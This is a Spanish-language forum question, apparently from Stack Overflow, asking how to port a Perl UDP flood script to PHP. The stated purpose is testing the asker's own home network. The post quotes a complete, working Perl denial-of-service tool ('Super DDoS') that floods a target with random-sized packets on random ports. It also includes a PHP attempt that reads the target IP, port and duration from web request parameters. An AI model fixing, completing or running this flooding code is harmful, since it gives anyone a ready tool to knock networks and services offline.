# Enviar paquetes con bytes utilizando el protocolo UDP en PHP

Tags: php

Estoy construyendo una herramienta que me permita testear la resistencia de mi red de casa contra un pequeño ataque DDoS por medio del protocolo UDP, utilizando PHP.

Encontré un script **Perl** que está funcionando pero que me gustaría traducir a PHP, intenté con algo similar a:

```
<?php

ignore_user_abort(true);

$ip = $_GET['ip'];
$port = $_GET['port'];
$psize = $_GET['packets'];
$time = $_GET['time'];
$endtime = time() + $time;

if(!$fp = fsockopen("udp://$ip", $port, $errno, $errstr)) {
die("No se pudo conectar a {$ip}.");
} else {
echo("Ejecutando...");
}

while(time() <= $endtime) {
fwrite($fp, $psize);
fclose($fp);
}
die("Completado.");
?>
```

Y no me ha resultado, el script **Perl** original era así (intentando igualar el script PHP superior):

```
#!/usr/bin/perl

##############
# udp flood.
##############

use Socket;
use strict;

if ($#ARGV != 3) {
print " \n";
print "Super DDoS // by Adrien\n\n";
print "Commande: flood.pl <ip> <port> <packets> <temps(en secondes)>\n";
print " port: le port à flood. Mettez 0 pour tous.\n";
print " packets: le nombre de packets à envoyer. Entre 64 et 1024.\n";
print " temps: le temps de flood en secondes.\n";
exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Impossible de se connecter à $ip\n";
$endtime = time() + ($time ? $time : 1000000);

socket(flood, PF_INET, SOCK_DGRAM, 17);


print "Flooding en cours sur $ip avec le port " . ($port ? $port : "random") . ", envoit de " . 
($size ? "$size-byte" : "random size") . " packets" . 
($time ? " pour $time secondes" : "") . "\n";
print "Attaque arrêtée avec Ctrl-C\n" unless $time;

for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1500-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;

send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
```

Gracias por sus respuestas.

Comment: Te devuelve algún error? Estás intentando ejecutar el script php en algún alojamiento externo? Lo comento porque muchos alojamientos externos tienen **capada** la función `fsockopen`